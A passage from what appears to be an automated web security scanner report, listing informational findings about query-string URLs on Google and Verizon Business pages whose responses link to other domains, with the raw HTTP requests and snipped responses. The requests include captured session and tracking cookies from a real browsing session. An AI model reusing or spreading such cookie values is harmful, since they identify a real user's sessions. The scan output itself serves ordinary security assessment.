src="http://pcwhitefencecom.112.2O7.net/b/ss/pcwhitefencecom/1/H.1--NS/
0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

15.34. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com

The response contains the following links to other domains:

http://netmail.verizon.net/
http://phones.verizonwireless.com/htc/thunderbolt/
http://promo.verizon.chinesesite.us.com/
http://resources.hewitt.com/verizon/
http://straightsets.blogs.nytimes.com/2011/09/04/tennis-channel-pulled-from-cablevision-and-verizon-systems/
http://verizonconnections.vzcomportal.com/
http://webcache.googleusercontent.com/search?q=cache:7sclGCLvV3UJ:www.vzwcareers.com/+.verizon.com&cd=9&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:A5a2oe7F6VwJ:www.verizonwireless.com/+.verizon.com&cd=8&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:AujoxX0bdP4J:verizonconnections.vzcomportal.com/+.verizon.com&cd=13&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:HvcASfqqhcQJ:www.verizon.com/+.verizon.com&cd=1&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:Ows3PsSIEQoJ:netmail.verizon.net/+.verizon.com&cd=15&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:fObhjvELd78J:www.connecttoverizon.com/+.verizon.com&cd=19&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:fcx5JUKZmC4J:www.careersatverizonwireless.com/+.verizon.com&cd=14&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:hy46YmOeJBsJ:promo.verizon.chinesesite.us.com/+.verizon.com&cd=18&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:yWFaZxHem0EJ:phones.verizonwireless.com/htc/thunderbolt/+.verizon.com&cd=17&hl=en&ct=clnk&gl=us
http://webmail.verizon.com/
http://www.att.com/
http://www.careersatverizonwireless.com/
http://www.comcast.com/
http://www.connecttoverizon.com/
http://www.nytimes.com/2011/09/02/opinion/verizons-tax-bill.html
http://www.pcmag.com/article2/0,2817,2392347,00.asp
http://www.qwest.com/
http://www.sprint.com/
http://www.verizon.com/
http://www.verizon.com/fiostv
http://www.verizon.com/support
http://www.verizonwireless.com/
http://www.vzwcareers.com/
http://www.youtube.com/results?q=.verizon.com&um=1&ie=UTF-8&sa=N&hl=en&tab=w1
http://www22.verizon.com/content/contactus/
http://www22.verizon.com/myverizon/
http://www22.verizon.com/residential/homephone/

Request

GET /search?sourceid=chrome&ie=UTF-8&q=.verizon.com HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:18:20 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 112200

<!doctype html> <head> <title>.verizon.com - Google Search</title> <script>window.google={kEI:"rEplTvvzK-rhiAKM1ZCiCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=.verizon.com&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.verizon.com/" class=l onmousedown="return clk(this,this.href,'','','','1','','0CEEQFjAA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:HvcASfqqhcQJ:www.verizon.com/+.verizon.com&cd=1&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CEMQIDAA')">Cached</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www22.verizon.com/myverizon/" class=l onmousedown="return clk(this,this.href,'','','','2','','0CEkQjBAwAQ')">MyVerizon 2.0</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www22.verizon.com/content/contactus/" class=l onmousedown="return clk(this,this.href,'','','','3','','0CE4QjBAwAg')">Contact Us</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.verizon.com/support" class=l onmousedown="return clk(this,this.href,'','','','4','','0CFMQjBAwAw')">Residential Support</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www22.verizon.com/residential/homephone/" class=l onmousedown="return clk(this,this.href,'','','','5','','0CFgQjBAwBA')">Phone</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.verizon.com/fiostv" class=l onmousedown="return clk(this,this.href,'','','','6','','0CF0QjBAwBQ')">FiOS TV</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://webmail.verizon.com/" class=l onmousedown="return clk(this,this.href,'','','','7','','0CGIQjBAwBg')">My Verizon 2.0 | Webmail</a>
...[SNIP]...
<h3 class="r"><a href="http://www.verizonwireless.com/" class=l onmousedown="return clk(this,this.href,'','','','8','','0CGsQFjAH')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:A5a2oe7F6VwJ:www.verizonwireless.com/+.verizon.com&cd=8&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','8','','0CG0QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.vzwcareers.com/" class=l onmousedown="return clk(this,this.href,'','','','9','','0CHIQFjAI')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:7sclGCLvV3UJ:www.vzwcareers.com/+.verizon.com&cd=9&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','9','','0CHQQIDAI')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://straightsets.blogs.nytimes.com/2011/09/04/tennis-channel-pulled-from-cablevision-and-verizon-systems/" class=l onmousedown="return clk(this,this.href,'','','','10','','0CHkQqQIwCQ')">Tennis Channel Pulled From Cablevision and <em>
...[SNIP]...
<span class=tl><a href="http://www.nytimes.com/2011/09/02/opinion/verizons-tax-bill.html" class=l onmousedown="return clk(this,this.href,'','','','11','','0CH8QqQIwCg')"><em>
...[SNIP]...
<span class=tl><a href="http://www.pcmag.com/article2/0,2817,2392347,00.asp" class=l onmousedown="return clk(this,this.href,'','','','12','','0CIUBEKkCMAs')"><em>
...[SNIP]...
<h3 class="r"><a href="http://verizonconnections.vzcomportal.com/" class=l onmousedown="return clk(this,this.href,'','','','13','','0CI0BEBYwDA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:AujoxX0bdP4J:verizonconnections.vzcomportal.com/+.verizon.com&cd=13&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','13','','0CI8BECAwDA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.careersatverizonwireless.com/" class=l onmousedown="return clk(this,this.href,'','','','14','','0CJMBEBYwDQ')">Sales | Customer Service Jobs At <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:fcx5JUKZmC4J:www.careersatverizonwireless.com/+.verizon.com&cd=14&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','14','','0CJYBECAwDQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://netmail.verizon.net/" class=l onmousedown="return clk(this,this.href,'','','','15','','0CJoBEBYwDg')">Welcome to <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:Ows3PsSIEQoJ:netmail.verizon.net/+.verizon.com&cd=15&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','15','','0CJwBECAwDg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://resources.hewitt.com/verizon/" class=l onmousedown="return clk(this,this.href,'','','','16','','0CKEBEBYwDw')"><em>
...[SNIP]...
<h3 class="r"><a href="http://phones.verizonwireless.com/htc/thunderbolt/" class=l onmousedown="return clk(this,this.href,'','','','17','','0CKQBEBYwEA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:yWFaZxHem0EJ:phones.verizonwireless.com/htc/thunderbolt/+.verizon.com&cd=17&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','17','','0CKYBECAwEA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://promo.verizon.chinesesite.us.com/" class=l onmousedown="return clk(this,this.href,'','','','18','','0CKoBEBYwEQ')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:hy46YmOeJBsJ:promo.verizon.chinesesite.us.com/+.verizon.com&cd=18&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','18','','0CKwBECAwEQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.connecttoverizon.com/" class=l onmousedown="return clk(this,this.href,'','','','19','','0CLEBEBYwEg')">Order <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:fObhjvELd78J:www.connecttoverizon.com/+.verizon.com&cd=19&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','19','','0CLMBECAwEg')">Cached</a>
...[SNIP]...
<div><a href="http://www.att.com/" class=l onmousedown="return clk(this,this.href,'','','','20','','0CLkBEKIIMBM')">AT&T</a>
...[SNIP]...
<div><a href="http://www.comcast.com/" class=l onmousedown="return clk(this,this.href,'','','','21','','0CLsBEKIIMBQ')">Comcast</a>
...[SNIP]...
<div><a href="http://www.sprint.com/" class=l onmousedown="return clk(this,this.href,'','','','22','','0CL0BEKIIMBU')">Sprint</a>
...[SNIP]...
<div><a href="http://www.qwest.com/" class=l onmousedown="return clk(this,this.href,'','','','23','','0CL8BEKIIMBY')">Qwest</a>
...[SNIP]...

15.35. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=30&ved=0CE4QFjAJOBQ&url=http%3A%2F%2Fnewscenter.verizon.com%2Ffact-sheets%2Fverizon-high-speed-internet.html&ei=Z1BlTrq0NqnjiALbl6G0Cg&usg=AFQjCNE1Cv7LYF5ETzO6gV20U9K8tA56ew

The response contains the following link to another domain:

http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html

Request

GET /url?sa=t&source=web&cd=30&ved=0CE4QFjAJOBQ&url=http%3A%2F%2Fnewscenter.verizon.com%2Ffact-sheets%2Fverizon-high-speed-internet.html&ei=Z1BlTrq0NqnjiALbl6G0Cg&usg=AFQjCNE1Cv7LYF5ETzO6gV20U9K8tA56ew HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=U1BlTuKkG8bkiAKp37G7Cg&start=20&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL

Response

HTTP/1.1 302 Found
Location: http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:43:12 GMT
Server: gws
Content-Length: 271
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html">here</A>
...[SNIP]...

15.36. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=18&ved=0CEUQFjAHOAo&url=http%3A%2F%2Fdeveloper.verizon.com%2Fjsps%2FdevCenters%2FSmart_Phone%2FLanding_Pages%2FAppendixICategoryDefinitions.jsp&ei=U1BlTuKkG8bkiAKp37G7Cg&usg=AFQjCNE4Pa8Pk6zX3Ndl0MUlZ4yZOE-AmQ

The response contains the following link to another domain:

http://developer.verizon.com/jsps/devCenters/Smart_Phone/Landing_Pages/AppendixICategoryDefinitions.jsp

Request

GET /url?sa=t&source=web&cd=18&ved=0CEUQFjAHOAo&url=http%3A%2F%2Fdeveloper.verizon.com%2Fjsps%2FdevCenters%2FSmart_Phone%2FLanding_Pages%2FAppendixICategoryDefinitions.jsp&ei=U1BlTuKkG8bkiAKp37G7Cg&usg=AFQjCNE4Pa8Pk6zX3Ndl0MUlZ4yZOE-AmQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=RVBlTuSuBePmiAKx7NyXCg&start=10&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL

Response

HTTP/1.1 302 Found
Location: http://developer.verizon.com/jsps/devCenters/Smart_Phone/Landing_Pages/AppendixICategoryDefinitions.jsp
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:42:41 GMT
Server: gws
Content-Length: 300
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://developer.verizon.com/jsps/devCenters/Smart_Phone/Landing_Pages/AppendixICategoryDefinitions.jsp">here</A>
...[SNIP]...

15.37. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=14&ved=0CCoQFjADOAo&url=http%3A%2F%2Fheadlines.verizon.com%2F&ei=U1BlTuKkG8bkiAKp37G7Cg&usg=AFQjCNGZq-jF7q0A-655hnSCWeSY7F6Ndg

The response contains the following link to another domain:

http://headlines.verizon.com/

Request

GET /url?sa=t&source=web&cd=14&ved=0CCoQFjADOAo&url=http%3A%2F%2Fheadlines.verizon.com%2F&ei=U1BlTuKkG8bkiAKp37G7Cg&usg=AFQjCNGZq-jF7q0A-655hnSCWeSY7F6Ndg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=RVBlTuSuBePmiAKx7NyXCg&start=10&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL

Response

HTTP/1.1 302 Found
Location: http://headlines.verizon.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:42:33 GMT
Server: gws
Content-Length: 226
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://headlines.verizon.com/">here</A>
...[SNIP]...

15.38. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=19&ved=0CEsQFjAIOAo&url=http%3A%2F%2Fforums.verizon.com%2Ft5%2FFiOS-Internet%2FNeed-webmail-contacts-CSV-titles%2Ftd-p%2F23248&ei=U1BlTuKkG8bkiAKp37G7Cg&usg=AFQjCNGz71h4jdKwUyipZeTsbjfutkBdYg

The response contains the following link to another domain:

http://forums.verizon.com/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248

Request

GET /url?sa=t&source=web&cd=19&ved=0CEsQFjAIOAo&url=http%3A%2F%2Fforums.verizon.com%2Ft5%2FFiOS-Internet%2FNeed-webmail-contacts-CSV-titles%2Ftd-p%2F23248&ei=U1BlTuKkG8bkiAKp37G7Cg&usg=AFQjCNGz71h4jdKwUyipZeTsbjfutkBdYg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#q=site:verizon.com+online+news+webmail&hl=en&prmd=ivns&ei=RVBlTuSuBePmiAKx7NyXCg&start=10&sa=N&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL

Response

HTTP/1.1 302 Found
Location: http://forums.verizon.com/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:42:47 GMT
Server: gws
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://forums.verizon.com/t5/FiOS-Internet/Need-webmail-contacts-CSV-titles/td-p/23248">here</A>
...[SNIP]...

15.39. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=3&ved=0CCQQFjAC&url=http%3A%2F%2Fpromo.verizon.com%2Fomk%2Fonline.shtml&ei=RVBlTuSuBePmiAKx7NyXCg&usg=AFQjCNHvqkJNtly-KFKxnzY3zUj_vxqEBg

The response contains the following link to another domain:

http://promo.verizon.com/omk/online.shtml

Request

GET /url?sa=t&source=web&cd=3&ved=0CCQQFjAC&url=http%3A%2F%2Fpromo.verizon.com%2Fomk%2Fonline.shtml&ei=RVBlTuSuBePmiAKx7NyXCg&usg=AFQjCNHvqkJNtly-KFKxnzY3zUj_vxqEBg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail#sclient=psy&hl=en&source=hp&q=site:verizon.com+online+news+webmail&pbx=1&oq=site:verizon.com+online+news+webmail&aq=f&aqi=&aql=&gs_sm=e&gs_upl=4585l6285l1l6781l2l2l0l0l0l0l144l261l0.2l2l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL

Response

HTTP/1.1 302 Found
Location: http://promo.verizon.com/omk/online.shtml
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:42:19 GMT
Server: gws
Content-Length: 238
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://promo.verizon.com/omk/online.shtml">here</A>
...[SNIP]...

15.40. http://www.verizonbusiness.com/(en)/topnav.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/(en)/topnav.xml

Issue detail

The page was loaded from a URL containing a query string:

http://www.verizonbusiness.com/(en)/topnav.xml?SetLang=en

The response contains the following links to other domains:

http://www22.verizon.com/indirectsales/
https://enterprisecenter.verizon.com/

Request

GET /(en)/topnav.xml?SetLang=en HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262243|VP%3d2|RMC%3dxg|LP%3den; __utma=58777642.1910521591.1315279004.1315279004.1315279004.1; __utmb=58777642.7.9.1315279041314; __utmc=58777642; __utmz=58777642.1315279004.1.1.utmcsr=www22.verizon.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.1 200 OK
Vary: Cookie, User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "dc4106de0e75fac7f3bd8a5571228054"
Last-Modified: Mon, 05 Sep 2011 22:18:10 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 16829
Date: Mon, 05 Sep 2011 22:18:10 GMT
Connection: close
Expires: Tue, 06 Sep 2011 02:16:45 GMT

<div >
<table>
<tr>
<td onMouseOut="if(self.vzDO)vzDO(this);" onMouseOver="if(self.vzDD)vzDD(this);" class="col1"><a href="/solutions/" />Solutions</a>
<ul class="one">
<li class="666" onMouseOu
...[SNIP]...
<li><a href="http://www22.verizon.com/indirectsales/" onclick="">United States</a>
...[SNIP]...
<li class="666" onMouseOut="vzDO(this)" onMouseOver="vzDD(this)"><a href="https://enterprisecenter.verizon.com" target="_blank">Enterprise Center Sign In</a>
...[SNIP]...

15.41. http://www.verizonbusiness.com/Medium/topnav.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/Medium/topnav.xml

Issue detail

The page was loaded from a URL containing a query string:

http://www.verizonbusiness.com/Medium/topnav.xml?SetLang=en

The response contains the following link to another domain:

http://www22.verizon.com/indirectsales/

Request

GET /Medium/topnav.xml?SetLang=en HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262200|VP%3d1|RMC%3dxg|LP%3den

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "5177b22b2a120bddf9cf9940b93509c8"
Last-Modified: Mon, 05 Sep 2011 22:16:42 GMT
Vary: Cookie, User-Agent
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 10644
Date: Mon, 05 Sep 2011 22:16:42 GMT
Connection: close
Expires: Mon, 05 Sep 2011 22:16:43 GMT

<div >
<table>
<tr>
<td class="col1" onMouseOut="if(self.vzDO)vzDO(this);" onMouseOver="if(self.vzDD)vzDD(this);"><a href="/Medium/solutions/" />Solutions</a>
<ul class="one">
<li class="666" onMo
...[SNIP]...
<li class="666" onMouseOut="vzDO(this)" onMouseOver="vzDD(this)"><a target="_blank" href="http://www22.verizon.com/indirectsales/">Indirect Sales</a>
...[SNIP]...

15.42. http://www.verizonbusiness.com/topnav.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verizonbusiness.com
Path:	/topnav.xml

Issue detail

The page was loaded from a URL containing a query string:

http://www.verizonbusiness.com/topnav.xml?SetLang=en

The response contains the following links to other domains:

http://www22.verizon.com/indirectsales/
https://enterprisecenter.verizon.com/

Request

GET /topnav.xml?SetLang=en HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262200|VP%3d1|RMC%3dxg|LP%3den

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: "5edfdb297456376e9251b4295da193e7"
Last-Modified: Mon, 05 Sep 2011 22:16:43 GMT
Vary: Cookie, User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 16829
Date: Mon, 05 Sep 2011 22:16:43 GMT
Connection: close
Expires: Tue, 06 Sep 2011 02:02:16 GMT

<div >
<table>
<tr>
